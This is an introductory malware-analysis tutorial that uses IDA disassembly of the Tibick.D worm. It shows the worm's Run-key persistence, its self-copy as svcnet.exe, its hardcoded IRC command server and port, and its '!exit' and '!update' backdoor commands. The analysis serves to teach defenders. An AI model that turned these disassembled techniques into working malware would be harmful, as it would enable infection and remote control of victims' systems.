Malware is a serious threat to computer systems. The term 'malware' is a superset of many different types of malicious code, including viruses, worms, rootkits, spyware and other threats. A long formal definition of 'malware' or the variants of malware is beyond the scope of this article, so I'll only give a very brief distinction of viruses and worms. A virus replicates itself by attaching it to some forms of executable code, for example PE-Files(.exe,.dll,..) on Windows, whereas a worm mostly spreads using the internet. It uses security holes in software or just sends itself disguised as a trustworthy email to other users or uses peer-to-peer technology. There are more differences but they have already been discussed repeatedly in other articles.
Being able to understand and dissect the inner workings of such malicious code is an important ability in the field of reverse engineering, since it makes it possible to detect in which way the system is modified by the malware, to make systems more safe against malicious code and to make a secure recognition of malicious code possible. The aim of this article is to give an introduction to the field of malware analysis. The worm dissected later in this article is neither new nor unknown and has been analyzed already. A very simple and primitive worm has been chosen to make this article most understandable especially to those who never reversed a worm before or are (relatively) new to reverse engineering.
This article might be not very interesting for advanced (malware-)reversers.
The reader of this paper should have basic knowledge of x86-assembly language and the Win32-API including it's networking capabilities(WinSock). However, since the code and structure of the Tibick.D worm is very simple and easy to follow, the code should be understandable even if you haven't much experience in reading disassembled code. Besides that the reader should have some practice in the handling of the favorite disassembler (and debugger).
The software used in this document is available for free on The Internet.
The worm Tibick.D is a fairly simple variant of a worm. It has to be downloaded and run by the user. It doesn't infect other existing files and spreads over various peer-to-peer networks under a lot of different filenames( as we will see later). I've chosen this worm to give an introduction to malware reversing. In further articles we'll dissect more complicated examples which use more sophisticated techniques to hide their presence or to spread.
In this article we'll analyze our target only by looking at the disassembly. Normally other techniques and programs are used like network-sniffers or file/registry monitors, but since it's just a simple example of malware and a deadlisting of the code gives the most information, I left out these parts intentionally.
We will start by scanning the file with PEiD to find out whether a packer was used and with which compiler the worm has been compiled. PEiD will show "LCC Win32 1.x -> Jacob Navia [Overlay]" which sounds good, since we won't have to bother with unpacking the executable. However we shouldn't trust PEiD completely since it can be fooled by placing a fake signature at the entry point. The executable contains 3 sections(".text", ".data",".idata") what is a normal layout for exe-files.
To go on we use IDA to disassemble the file. The entry point of the executable looks rather normal, since it's default entry point generated by the lcc compiler:
.text:00401219 public start
.text:00401219 start proc near
.text:00401219
.text:00401219 var_30 = word ptr -30h
.text:00401219 var_18 = dword ptr -18h
.text:00401219 var_4 = dword ptr -4
.text:00401219
.text:00401219 mov eax, large fs:0
.text:0040121F push ebp
.text:00401220 mov ebp, esp
.text:00401222 push 0FFFFFFFFh
.text:00401224 push offset unk_40401C
.text:00401229 push offset loc_40109A
.text:0040122E push eax
.text:0040122F mov large fs:0, esp
.text:00401236 sub esp, 10h
.text:00401239 push ebx
.text:0040123A push esi
.text:0040123B push edi
.text:0040123C mov [ebp+var_18], esp
.text:0040123F push eax
.text:00401240 fnstcw [esp+30h+var_30]
.text:00401243 or word ptr [esp], 300h
.text:00401249 fldcw [esp+30h+var_30]
.text:0040124C add esp, 4
.text:0040124F push 0
.text:00401251 push 0
.text:00401253 push offset dword_404028
.text:00401258 push offset dword_404024
.text:0040125D push offset dword_404020
.text:00401262 call __GetMainArgs
.text:00401267 push dword_404028
.text:0040126D push dword_404024
.text:00401273 push dword_404020
.text:00401279 mov dword_404014, esp
.text:0040127F call sub_402FE8
.text:00401284 add esp, 18h
.text:00401287 xor ecx, ecx
.text:00401289 mov [ebp+var_4], ecx
.text:0040128C push eax
.text:0040128D call exit
.text:00401292 leave
.text:00401293 retn
.text:00401293 start endp
At first, a structured exception handler(seh) is installed. After that the executable retrieves the arguments and passes them to function which seems to be the main()-function defined by the programmer. To proceed we take a look at the function(sub_402FE8):
.text:00402FE8 push ebp .text:00402FE9 mov ebp, esp .text:00402FEB push ecx .text:00402FEC push edi .text:00402FED call GetCommandLineA .text:00402FF2 mov edi, eax .text:00402FF4 cmp byte ptr [edi], 22h .text:00402FF7 jnz short loc_40301C .text:00402FF9 push 22h .text:00402FFB mov eax, edi .text:00402FFD inc eax .text:00402FFE push eax .text:00402FFF call strchr .text:00403004 add esp, 8 .text:00403007 mov [ebp+var_4], eax .text:0040300A or eax, eax .text:0040300C jz short loc_403037 .text:0040300E mov edi, eax .text:00403010 inc edi .text:00403011 jmp short loc_403014
This code starts by obtaining a pointer to the command line string by using the API GetCommandlineA and checks whether the first character is a quotation mark(It's ascii code equals 0x22). If the first character is not a quotation mark it jumps over the following code.
Otherwise it proceeds by searching the rest of the string for a quotation mark using the strchr-function which is a standard C function and searches for the first occurrence of a character in the string. The purpose of that code snippet is to check whether the path of the program is separated by quotation marks from the arguments. When you run an executable by double-clicking on it, the path of the executable is separated by quotation marks to make spaces in path names possible, which otherwise wouldn't be distinguishable from the spaces between the path and the arguments.
Subsequently, the worm obtains the beginning of the arguments by searching for the first character after a space(either starting from the second quotation mark, if any, or from the beginning of the string).
.text:00403037 push 0 ; lpModuleName
.text:00403039 call GetModuleHandleA
.text:0040303E push 1
.text:00403040 push edi
.text:00403041 push 0
.text:00403043 push eax
.text:00403044 call sub_4029B3
.text:00403049 pop edi
.text:0040304A leave
.text:0040304B retn
.text:0040304B sub_402FE8 endp
This code passes the pointer to the program arguments and the module handle to the function at 0x4029B3. Now let's take a look at that function:
.text:004029B3 sub_4029B3 proc near ; CODE XREF: sub_402FE8+5C .text:004029B3 .text:004029B3 Parameter = byte ptr -6C0h .text:004029B3 var_5C0 = byte ptr -5C0h .text:004029B3 var_4C0 = dword ptr -4C0h .text:004029B3 var_4BC = dword ptr -4BCh .text:004029B3 var_4B8 = dword ptr -4B8h .text:004029B3 WSAData = WSAData ptr -4ACh .text:004029B3 hKey = dword ptr -31Ch .text:004029B3 ThreadId = dword ptr -318h .text:004029B3 var_314 = byte ptr -314h .text:004029B3 buf = byte ptr -214h .text:004029B3 addr = byte ptr -114h .text:004029B3 String = byte ptr -110h .text:004029B3 name = sockaddr ptr -10h .text:004029B3 lpString1 = dword ptr 10h .text:004029B3 .text:004029B3 push ebp .text:004029B4 mov ebp, esp .text:004029B6 sub esp, 6C0h .text:004029BC push ebx .text:004029BD push esi .text:004029BE push edi .text:004029BF push offset aTbc3_hanged_tk ; "tbc3.hanged.tk" .text:004029C4 call sub_40132B .text:004029C9 pop ecx .text:004029CA cmp eax, 50Eh .text:004029CF jnz short loc_4029E3 .text:004029D1 push offset aTibicP2p3 ; "##TIBiC-P2P3##" .text:004029D6 call sub_40132B .text:004029DB pop ecx .text:004029DC cmp eax, 349h .text:004029E1 jz short loc_4029EB .text:004029E3 .text:004029E3 loc_4029E3: ; CODE XREF: sub_4029B3+1C .text:004029E3 push 0 .text:004029E5 call exit
IDA has already guessed some names of the local variables like ThreadId or WSAData, what tells us that the malware will somehow use the socket functions and connect to the the internet.
This routine starts by passing two hard coded strings to a routine and comparing the results with hard coded values. A guess might be that the routine creates a simple checksum from the strings and the returned checksum is compared to a hard coded one to prevent the file from manipulations in the important parts. To check this assumptions, we take a look at sub_40132B:
.text:0040132B sub_40132B proc near ; CODE XREF: sub_4029B3+11 .text:0040132B ; sub_4029B3+23 .text:0040132B .text:0040132B arg_0 = dword ptr 8 .text:0040132B .text:0040132B push ebx .text:0040132C mov ebx, [esp+arg_0] .text:00401330 xor edx, edx .text:00401332 mov ecx, edx .text:00401334 jmp short loc_40133D .text:00401336 ; --------------------------------------------------------------------------- .text:00401336 .text:00401336 loc_401336: ; CODE XREF: sub_40132B+16 .text:00401336 movsx eax, byte ptr [ebx+ecx] .text:0040133A add edx, eax .text:0040133C inc ecx .text:0040133D .text:0040133D loc_40133D: ; CODE XREF: sub_40132B+9 .text:0040133D cmp byte ptr [ebx+ecx], 0 .text:00401341 jnz short loc_401336 .text:00401343 mov eax, edx .text:00401345 pop ebx .text:00401346 retn .text:00401346 sub_40132B endp
In order to preserve the value of the register ebx is pushed at the beginning of the function and the argument(the pointer to a string) is moved to ebx. edx and ecx are both set to zero by XORing edx with itself. This is a standard example of optimization: The more obvious "mov edx,0" would not only need more space within the file, it would also be slower than the method used by the compiler.
After that it adds the values of the characters to the edx register, until the terminating null-character is found. That means that our assumption is right and the malware performs an integrity check on the two strings.
However, the two strings which are passed to this routine("tbc3.hanged.tk" and "##TIBiC-P2P3##") seem to be important, we should keep them in mind.
After the checksumming, this code follows:
.text:004029EB lea eax, [ebp+WSAData] .text:004029F1 push eax ; lpWSAData .text:004029F2 push 101h ; wVersionRequested .text:004029F7 call WSAStartup .text:004029FC or eax, eax .text:004029FE jz short loc_402A08 .text:00402A00 xor eax, eax .text:00402A02 inc eax .text:00402A03 jmp loc_402F36 .text:00402A08 ; --------------------------------------------------------------------------- .text:00402A08 .text:00402A08 loc_402A08: ; CODE XREF: sub_4029B3+4B .text:00402A08 call GetTickCount .text:00402A0D push eax .text:00402A0E call srand .text:00402A13 push offset aTpguxbsfNjdspt ; "Tpguxbsf]Njdsptpgu]Xjoepxt]DvssfouWfstj"... .text:00402A18 lea eax, [ebp+String] .text:00402A1E push eax .text:00402A1F call wsprintfA .text:00402A24 push 0FFFFFFFFh .text:00402A26 lea eax, [ebp+String] .text:00402A2C push eax .text:00402A2D call sub_4012FC .text:00402A32 add esp, 14h .text:00402A35 push 0 ; lpdwDisposition .text:00402A37 lea eax, [ebp+hKey] .text:00402A3D push eax ; phkResult .text:00402A3E push 0 ; lpSecurityAttributes .text:00402A40 push 0F003Fh ; samDesired .text:00402A45 push 0 ; dwOptions .text:00402A47 push 0 ; lpClass .text:00402A49 push 0 ; Reserved .text:00402A4B lea eax, [ebp+String] .text:00402A51 push eax ; lpSubKey .text:00402A52 push 80000002h ; hKey .text:00402A57 call RegCreateKeyExA .text:00402A5C push offset aSvcnet_exe ; lpString .text:00402A61 call lstrlenA .text:00402A66 push eax ; cbData .text:00402A67 push offset aSvcnet_exe ; lpData .text:00402A6C push 1 ; dwType .text:00402A6E push 0 ; Reserved .text:00402A70 push offset aShellapi32 ; lpValueName .text:00402A75 push [ebp+hKey] ; hKey .text:00402A7B call RegSetValueExA .text:00402A80 push [ebp+hKey] ; hKey .text:00402A86 call RegCloseKey .text:00402A8B push 0 ; lpdwDisposition .text:00402A8D lea eax, [ebp+hKey] .text:00402A93 push eax ; phkResult .text:00402A94 push 0 ; lpSecurityAttributes .text:00402A96 push 0F003Fh ; samDesired .text:00402A9B push 0 ; dwOptions .text:00402A9D push 0 ; lpClass .text:00402A9F push 0 ; Reserved .text:00402AA1 lea eax, [ebp+String] .text:00402AA7 push eax ; lpSubKey .text:00402AA8 push 80000001h ; hKey .text:00402AAD call RegCreateKeyExA .text:00402AB2 push offset aSvcnet_exe ; lpString .text:00402AB7 call lstrlenA .text:00402ABC push eax ; cbData .text:00402ABD push offset aSvcnet_exe ; lpData .text:00402AC2 push 1 ; dwType .text:00402AC4 push 0 ; Reserved .text:00402AC6 push offset aShellapi32 ; lpValueName .text:00402ACB push [ebp+hKey] ; hKey .text:00402AD1 call RegSetValueExA .text:00402AD6 push [ebp+hKey] ; hKey .text:00402ADC call RegCloseKey
The code starts by initializing the WinSock-API, checks the result for success and if initialization failed, this functions is left, which leads to termination of the program. After the initialization various registry accesses follow. The name of the subkey accessed seems to be stored in an encrypted form and is therefore copied to a buffer using the wsprintf-API and a pointer to this buffer is then passed to a function which has to be the decryption routine, because otherwise the registry access would fail. The function takes 2 arguments: The first one(they are PUSH-ed in reverse order, since the c-calling convention is used) is a pointer to the string which is going to be decrypted and the second one(0xFFFFFFFF) has no obvious meaning at this point, but when we go into the function we will figure out it's meaning. The function itself isn't very long:
.text:004012FC sub_4012FC proc near ; CODE XREF: sub_4014DF+25 .text:004012FC ; sub_4016E6+36 ... .text:004012FC .text:004012FC arg_0 = dword ptr 10h .text:004012FC arg_4 = dword ptr 14h .text:004012FC .text:004012FC push ebx .text:004012FD push esi .text:004012FE push edi .text:004012FF mov esi, [esp+arg_0] .text:00401303 mov ebx, [esp+arg_4] .text:00401307 xor edi, edi .text:00401309 jmp short loc_401315 .text:0040130B ; --------------------------------------------------------------------------- .text:0040130B .text:0040130B loc_40130B: ; CODE XREF: sub_4012FC+27 .text:0040130B movsx eax, byte ptr [esi+edi] .text:0040130F add eax, ebx .text:00401311 mov [esi+edi], al .text:00401314 inc edi .text:00401315 .text:00401315 loc_401315: ; CODE XREF: sub_4012FC+D .text:00401315 mov ecx, esi .text:00401317 or eax, 0FFFFFFFFh .text:0040131A .text:0040131A loc_40131A: ; CODE XREF: sub_4012FC+23 .text:0040131A inc eax .text:0040131B cmp byte ptr [ecx+eax], 0 .text:0040131F jnz short loc_40131A .text:00401321 cmp edi, eax .text:00401323 jl short loc_40130B .text:00401325 mov eax, esi
At first the function performs the saving of the registers which it's going to use(a normal function may only change the values of eax,ecx and edx) and then loads the second argument into ebx and the first into esi. Edi is set to zero and serves as a counting variable in the loop that follows. The loop reads one character from the string, adds the second parameter to it and writes the resulting byte back to the string. After that the length of the string is computed(in each round of the loop, what is a waste of clock cycles) and then compared to edi, which is incremented each round. If it's higher or equal, the loop exits. In the particular case that the second param is 0xFFFFFFFF, every character of the string is just decremented since 0xFFFFFFFF is the representation of -1(two-complement). To decode the string we can either code the used algorithm in our favorite language, apply it manually, or debug the malware while decrypting the string. But do the debugging on the isolated environment and not on your real system(If you want to risk your system's integrity by the possibilty that the file is accidentally executed completely in the debugger, you can run it until this code and then stop the process on your real system).
By doing so, we get the decrypted string "Software\Microsoft\Windows\CurrentVersion\Run" which is most probably used for creating an autostart entry for the malware. The key is created twice, only the RootKey argument for the calls to RegOpenKeyEx differs. By right-clicking on the values we can tell IDA to display the symbolic names for the values. That way we find out, that the key is created in two root keys: HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER. The name and the value of the created entry are hard coded to "Shellapi32" and "svcnet.exe" probably in the hope that they will be mistaken for the legitimate svchost(Generic Host Process for Win32 services) process which runs multiple times per default on a default Windows installation.
After creating the autostart-entries, the malware continues with that:
.text:00402AE1 push offset aSvcnet_exe ; lpName .text:00402AE6 push 0 ; bInheritHandle .text:00402AE8 push 1F0001h ; dwDesiredAccess .text:00402AED call OpenMutexA .text:00402AF2 mov edi, eax .text:00402AF4 or eax, eax .text:00402AF6 jz short loc_402B00 .text:00402AF8 xor eax, eax .text:00402AFA inc eax .text:00402AFB jmp loc_402F36 .text:00402B00 ; --------------------------------------------------------------------------- .text:00402B00 .text:00402B00 loc_402B00: ; CODE XREF: sub_4029B3+143 .text:00402B00 push offset aSvcnet_exe ; lpName .text:00402B05 push 0 ; bInitialOwner .text:00402B07 push 0 ; lpMutexAttributes .text:00402B09 call CreateMutexA
The worm uses a mutex with the name "svcnet.exe" to check if it's already running on the system. A short description: A mutex, which is short for mutual exclusion, is a mechanism to ensure that an object is used by only one thread at any given time. If the mutex has not been created, the function fails resulting in the execution of the CreateMutexA-call and the following code. Otherwise the function exits since the mutex has already been created and another instance of the malware seems to be running.
Subsequently the malware continues by examining it's filename and path:
.text:00402B10 push 0 ; lpModuleName .text:00402B12 call GetModuleHandleA .text:00402B17 push 0FFh ; nSize .text:00402B1C lea edx, [ebp+String] .text:00402B22 push edx ; lpFilename .text:00402B23 push eax ; hModule .text:00402B24 call GetModuleFileNameA .text:00402B29 push 0FFh ; uSize .text:00402B2E lea eax, [ebp+buf] .text:00402B34 push eax ; lpBuffer .text:00402B35 call GetSystemDirectoryA .text:00402B3A lea eax, [ebp+buf] .text:00402B40 push eax .text:00402B41 lea eax, [ebp+String] .text:00402B47 push eax .text:00402B48 call sub_40304C .text:00402B4D add esp, 8 .text:00402B50 or eax, eax .text:00402B52 jz short loc_402B6C .text:00402B54 push offset aSvcnet_exe ; "svcnet.exe" .text:00402B59 lea edx, [ebp+String] .text:00402B5F push edx .text:00402B60 call sub_40304C .text:00402B65 add esp, 8 .text:00402B68 or eax, eax .text:00402B6A jnz short loc_402BDE
This code obtains the current module filename and the path of the system directory. The module is passed to another function two times, one time with the system directory as another argument and the other time with the "svcnet.exe" string which has already been used in the malware and is the name under which the malware plans to hide itself within the system. The result of sub_40304C is both times checked for being non-zero. It seems that the called functions performs some kind of string comparison to check whether the malware is running from GetSystemDirectory()\svcnet.exe. The system directory is normally Windows\system32 or WinNT\system32. If the filename and path differ, this code is executed:
.text:00402B6C .text:00402B6C loc_402B6C: ; CODE XREF: sub_4029B3+19F .text:00402B6C push offset String2 ; lpString2 .text:00402B71 lea eax, [ebp+buf] .text:00402B77 push eax ; lpString1 .text:00402B78 call lstrcatA .text:00402B7D push offset aSvcnet_exe ; lpString2 .text:00402B82 lea eax, [ebp+buf] .text:00402B88 push eax ; lpString1 .text:00402B89 call lstrcatA .text:00402B8E push 0 ; bFailIfExists .text:00402B90 lea eax, [ebp+buf] .text:00402B96 push eax ; lpNewFileName .text:00402B97 lea eax, [ebp+String] .text:00402B9D push eax ; lpExistingFileName .text:00402B9E call CopyFileA .text:00402BA3 or eax, eax .text:00402BA5 jnz short loc_402BAD .text:00402BA7 inc eax .text:00402BA8 jmp loc_402F36 .text:00402BAD ; --------------------------------------------------------------------------- .text:00402BAD loc_402BAD: ; CODE XREF: sub_4029B3+1F2 .text:00402BAD push 0 ; nShowCmd .text:00402BAF push 0 ; lpDirectory .text:00402BB1 push 0 ; lpParameters .text:00402BB3 lea eax, [ebp+buf] .text:00402BB9 push eax ; lpFile .text:00402BBA push offset aOpen ; lpOperation .text:00402BBF push 0 ; hwnd .text:00402BC1 call ShellExecuteA .text:00402BC6 push offset aInstant ; lpString2 .text:00402BCB push [ebp+lpString1] ; lpString1 .text:00402BCE call lstrcmpA .text:00402BD3 or eax, eax .text:00402BD5 jz short loc_402BDE .text:00402BD7 xor eax, eax .text:00402BD9 jmp loc_402F36
The first call to lstrcatA appends an backslash to the system directory. The second call concatenates "svcnet.exe" and the system directory together and then uses it as an argument to CopyFileA. So the malware indeed copies itself to the system directory under the name "svcnet.exe". Such behaviour is very common to malware, since a user might think this file is a normal system file and might not notice that this file is malware. When the copying fails, the malware gives up and exits. If it succeeds the created file is executed using the ShellExecuteA-API. After the ShellExecuteA-Call a call to lstrcmpA follows, in which the argument "lpString1" is compared to the string "instant". But what was passed to this function? The answer is that the pointer to the string with the program arguments is the argument which is now being compared. So if the first command line was "...\malware.exe instant" the program continues execution, otherwise it exits.
Once the malware placed itself in the system folder, it makes the system accessible to attackers. The following code is executed, once the malware has checked that it's being run from the system folder under the desired name or when the parameter "instant" was specified:
.text:00402BDE loc_402BDE: ; CODE XREF: sub_4029B3+1B7 .text:00402BDE ; sub_4029B3+222 .text:00402BDE lea eax, [ebp+ThreadId] .text:00402BE4 push eax ; lpThreadId .text:00402BE5 push 0 ; dwCreationFlags .text:00402BE7 push 0 ; lpParameter .text:00402BE9 push offset StartAddress ; lpStartAddress .text:00402BEE push 0 ; dwStackSize .text:00402BF0 push 0 ; lpThreadAttributes .text:00402BF2 call CreateThread .text:00402BF7 .text:00402BF7 loc_402BF7: ; CODE XREF: sub_4029B3+2DC .text:00402BF7 ; sub_4029B3+57C .text:00402BF7 push 10h .text:00402BF9 lea eax, [ebp+name] .text:00402BFC push eax .text:00402BFD call RtlZeroMemory .text:00402C02 mov [ebp+name.sa_family], 2 .text:00402C08 push 1A0Bh ; hostshort .text:00402C0D call htons .text:00402C12 mov edx, eax .text:00402C14 mov word ptr [ebp+name.sa_data], dx .text:00402C18 push offset aTbc3_hanged_tk ; cp .text:00402C1D call inet_addr .text:00402C22 mov dword ptr [ebp+addr], eax .text:00402C28 cmp eax, 0FFFFFFFFh .text:00402C2B jnz short loc_402C3B .text:00402C2D push offset aTbc3_hanged_tk ; name .text:00402C32 call gethostbyname .text:00402C37 mov ebx, eax .text:00402C39 jmp short loc_402C4D .text:00402C3B ; --------------------------------------------------------------------------- .text:00402C3B .text:00402C3B loc_402C3B: ; CODE XREF: sub_4029B3+278 .text:00402C3B push 2 ; type .text:00402C3D push 4 ; len .text:00402C3F lea eax, [ebp+addr] .text:00402C45 push eax ; addr .text:00402C46 call gethostbyaddr .text:00402C4B mov ebx, eax .text:00402C4D .text:00402C4D loc_402C4D: ; CODE XREF: sub_4029B3+286 .text:00402C4D or ebx, ebx .text:00402C4F jnz short loc_402C5D .text:00402C51 push 2710h ; dwMilliseconds .text:00402C56 call Sleep .text:00402C5B jmp short loc_402C8F .text:00402C5D ; ---------------------------------------------------------------------------
The first thing it does, is to create a new thread to run in the background, but we will ignore it for now and analyze it later. After the creation of a new thread, the worm makes use of the Windows socket functions. It fills a 0x10 byte long structure with zeros, which is later used by functions like socket(). This is most likely the sockaddr struct. The code proceeds by converting the desired port to the network byte order by using the htons function. The port number to be converted is 0x1A0B or 6667 in decimal, which is the default port for internet relay chat(irc).
After that it does something senseless by trying to obtain the address of "tbc3.hanged.tk" using inet_addr(), which only converts ip-addresses in the standard "dot-notation"(e.g. "127.0.0.1") into the format used by socket functions. The function is not suitable for urls like "www.google.com" or the one used by the malware. If this fails and inet_addr() returns -1, the worm tries to obtain the address of the host by using the "correct" function gethostbyname() and again checks the result for validity. If it's invalid it calls Sleep, retries and repeats this until the host is found.
So this is the place where the string "tbc3.hanged.tk", which was checked for integrity (in a very insecure manner) earlier, gets used. After obtaining a usable address for this host, it tries to connect to it:
.text:00402C5D loc_402C5D: ; CODE XREF: sub_4029B3+29C .text:00402C5D mov eax, [ebx+0Ch] .text:00402C60 mov eax, [eax] .text:00402C62 mov eax, [eax] .text:00402C64 mov dword ptr [ebp+name.sa_data+2], eax .text:00402C67 push 6 ; protocol .text:00402C69 push 1 ; type .text:00402C6B push 2 ; af .text:00402C6D call socket .text:00402C72 mov esi, eax .text:00402C74 push 10h ; namelen .text:00402C76 lea eax, [ebp+name] .text:00402C79 push eax ; name .text:00402C7A push esi ; s .text:00402C7B call connect .text:00402C80 cmp eax, 0FFFFFFFFh .text:00402C83 jnz short loc_402C94 .text:00402C85 push 2710h ; dwMilliseconds .text:00402C8A call Sleep .text:00402C8F .text:00402C8F loc_402C8F: ; CODE XREF: sub_4029B3+2A8 .text:00402C8F jmp loc_402BF7 .text:00402C94 ; --------------------------------------------------------------------------- .text:00402C94 .text:00402C94 loc_402C94: ; CODE XREF: sub_4029B3+2D0 .text:00402C94 push 100h .text:00402C99 lea eax, [ebp+String] .text:00402C9F push eax .text:00402CA0 call sub_40129C .text:00402CA5 mov [ebp+var_4B8], eax .text:00402CAB push 100h .text:00402CB0 lea edx, [ebp+var_314] .text:00402CB6 push edx .text:00402CB7 call sub_40129C .text:00402CBC push eax .text:00402CBD mov edx, [ebp+var_4B8] .text:00402CC3 push edx .text:00402CC4 push offset aNickSUserS__Ti ; "NICK %s\r\nUSER %s . . :TIBiCP2P\r\n" .text:00402CC9 lea edx, [ebp+buf] .text:00402CCF push edx .text:00402CD0 call wsprintfA .text:00402CD5 add esp, 20h .text:00402CD8 lea eax, [ebp+buf] .text:00402CDE push eax ; lpString .text:00402CDF call lstrlenA .text:00402CE4 push 0 ; flags .text:00402CE6 push eax ; len .text:00402CE7 lea edx, [ebp+buf] .text:00402CED push edx ; buf .text:00402CEE push esi ; s .text:00402CEF call send .text:00402CF4 cmp eax, 0FFFFFFFFh .text:00402CF7 jnz short loc_402D08 .text:00402CF9 push 2710h ; dwMilliseconds .text:00402CFE call Sleep .text:00402D03 jmp loc_402F2F .text:00402D08 ; ---------------------------------------------------------------------------
The code starts by creating a default socket. It then connects to "tbc3.hanged.tk" using the sockaddr struct initialized before. If the call fails, the malware continues trying until it succeeds or the process is terminated. Another function is called two times and the pointers that are passed to this function are later used as a nick and user name in the irc-connection. Many malware uses irc-servers to provide backdoors to the attackers, since the infected system does not need to listen on a specific port. Ok, the function in question seems to create a nickname and a user name and takes two arguments, one being a pointer to memory and the second being a number, perhaps the size of the memory pointed to by the first parameter. Here's the code of the function(only the interesting part):
.text:004012A3 mov ebx, [ebp+arg_0] .text:004012A6 push [ebp+arg_4] .text:004012A9 push ebx .text:004012AA call RtlZeroMemory .text:004012AF call rand .text:004012B4 mov ecx, 6 .text:004012B9 cdq .text:004012BA idiv ecx .text:004012BC mov edi, edx .text:004012BE add edi, 4 .text:004012C1 mov [ebp+var_4], edi .text:004012C4 mov eax, [ebp+arg_4] .text:004012C7 cmp edi, eax .text:004012C9 jl short loc_4012CF .text:004012CB dec eax .text:004012CC mov [ebp+var_4], eax .text:004012CF .text:004012CF loc_4012CF: ; CODE XREF: sub_40129C+2D .text:004012CF xor esi, esi .text:004012D1 jmp short loc_4012EB .text:004012D3 ; --------------------------------------------------------------------------- .text:004012D3 .text:004012D3 loc_4012D3: ; CODE XREF: sub_40129C+52 .text:004012D3 call rand .text:004012D8 mov ecx, 1Ah .text:004012DD cdq .text:004012DE idiv ecx .text:004012E0 mov edi, edx .text:004012E2 add edi, 61h .text:004012E5 mov edx, edi .text:004012E7 mov [ebx+esi], dl .text:004012EA inc esi .text:004012EB .text:004012EB loc_4012EB: ; CODE XREF: sub_40129C+35 .text:004012EB cmp esi, [ebp+var_4] .text:004012EE jl short loc_4012D3 .text:004012F0 mov byte ptr [esi+ebx+1], 0 .text:004012F5 mov eax, ebx
The function uses RtlZeroMemory to set the content of the target memory to zero. The second argument is indeed used as the size for the block. Afterwards a pseudo-random number is created. The subroutine calculates the remainder of the random number(when divided by 6) using the "idiv"-instruction and adds 4 to it. So this results in a number in the range from 4 to 9. This number is compared to the size of memory block, and if larger, it's replaced by (size - 1). So the created number seems to be the length of the string to be created. This code is followed by a loop which repeatedly creates pseudo-random numbers, takes the remainder(when divided by 0x1A), adds 0x61 and stores them in the memory. Effectively this loop creates lowercase ascii characters, since 0x61 is the ascii code of 'a' and 0x1A the length of the latin alphabet, what results in a string with the length from 4-9 being filled with random lowercase characters. So the malware connects to a hard coded irc-server using a random nick and user name. After it has logged in, a loop for receiving data from the server follows:
.text:00402D08 push 100h .text:00402D0D lea eax, [ebp+String] .text:00402D13 push eax .text:00402D14 call RtlZeroMemory .text:00402D19 jmp loc_402F09 .text:00402D1E ; --------------------------------------------------------------------------- .text:00402D1E .text:00402D1E loc_402D1E: ; CODE XREF: sub_4029B3+56C .text:00402D1E push offset aPing ; "PING " .text:00402D23 lea eax, [ebp+String] .text:00402D29 push eax .text:00402D2A call sub_40304C .text:00402D2F add esp, 8 .text:00402D32 mov edi, eax .text:00402D34 or eax, eax .text:00402D36 jz short loc_402D91 .text:00402D38 push offset asc_4058C1 ; ":" .text:00402D3D push edi .text:00402D3E call strtok .text:00402D43 push offset asc_4058BE ; "\r\n" .text:00402D48 push 0 .text:00402D4A call strtok .text:00402D4F mov edi, eax .text:00402D51 push offset aTibicP2p3 ; "##TIBiC-P2P3##" .text:00402D56 push offset aTibicP2p3 ; "##TIBiC-P2P3##" .text:00402D5B push edi .text:00402D5C push offset aPongSJoinS ; "PONG :%s\r\nJOIN %s\r\n" .text:00402D61 lea eax, [ebp+String] .text:00402D67 push eax .text:00402D68 call wsprintfA .text:00402D6D add esp, 24h .text:00402D70 lea eax, [ebp+String] .text:00402D76 push eax ; lpString .text:00402D77 call lstrlenA .text:00402D7C push 0 ; flags .text:00402D7E push eax ; len .text:00402D7F lea edx, [ebp+String] .text:00402D85 push edx ; buf .text:00402D86 push esi ; s .text:00402D87 call send
If the "PING"-response is received(after the worm logged in), the malware joins the channel "##TIBiC-P2P3##", which is the other checked string. Some other comparisons with the received response are done after that:
.text:00402D91 push offset aPrivmsg ; "PRIVMSG "
.text:00402D96 lea eax, [ebp+String]
.text:00402D9C push eax
.text:00402D9D call sub_40304C
.text:00402DA2 add esp, 8
.text:00402DA5 mov edi, eax
.text:00402DA7 or eax, eax
.text:00402DA9 jz loc_402F09
.text:00402DAF push offset asc_4058C1 ; ":"
.text:00402DB4 push edi
.text:00402DB5 call strstr
.text:00402DBA add esp, 8
.text:00402DBD or eax, eax
.text:00402DBF jz loc_402F09
.text:00402DC5 push offset asc_4058C1 ; ":"
.text:00402DCA push edi
.text:00402DCB call strtok
.text:00402DD0 push offset asc_4058BE ; "\r\n"
.text:00402DD5 push 0
.text:00402DD7 call strtok
.text:00402DDC add esp, 10h
.text:00402DDF mov edi, eax
.text:00402DE1 cmp byte ptr [edi], 21h
.text:00402DE4 jnz loc_402F09
This part of the code compares the received command with "PRIVMSG" which is sent went the client receives a private message. The response is then searched for colons to find the beginning of the text of the message. The first char is compared to 0x21 which represents the '!' sign. So the exclamation mark seems to indicate the beginning of a special backdoor-command. As we will see, the malware knows only two commands: "!exit" and "!update". Obviously the "!exit" command ends the malware process until the infected machine is restarted. The update command leads to the execution of this code:
.text:00402E24 push 0FFh ; uSize .text:00402E29 lea eax, [ebp+buf] .text:00402E2F push eax ; lpBuffer .text:00402E30 call GetSystemDirectoryA .text:00402E35 mov [ebp+var_4C0], esi .text:00402E3B and [ebp+var_4BC], 0 .text:00402E42 push edi .text:00402E43 push offset aS ; "%s" .text:00402E48 lea eax, [ebp+Parameter] .text:00402E4E push eax .text:00402E4F call wsprintfA .text:00402E54 push 100h .text:00402E59 lea eax, [ebp+var_314] .text:00402E5F push eax .text:00402E60 call sub_40129C .text:00402E65 push eax .text:00402E66 lea edx, [ebp+buf] .text:00402E6C push edx .text:00402E6D push offset aSS_exe ; "%s\\%s.exe" .text:00402E72 lea edx, [ebp+var_5C0] .text:00402E78 push edx .text:00402E79 call wsprintfA .text:00402E7E add esp, 24h .text:00402E81 lea eax, [ebp+ThreadId] .text:00402E87 push eax ; lpThreadId .text:00402E88 push 0 ; dwCreationFlags .text:00402E8A lea eax, [ebp+Parameter] .text:00402E90 push eax ; lpParameter .text:00402E91 push offset sub_401347 ; lpStartAddress .text:00402E96 push 0 ; dwStackSize .text:00402E98 push 0 ; lpThreadAttributes .text:00402E9A call CreateThread .text:00402E9F jmp short loc_402EA8
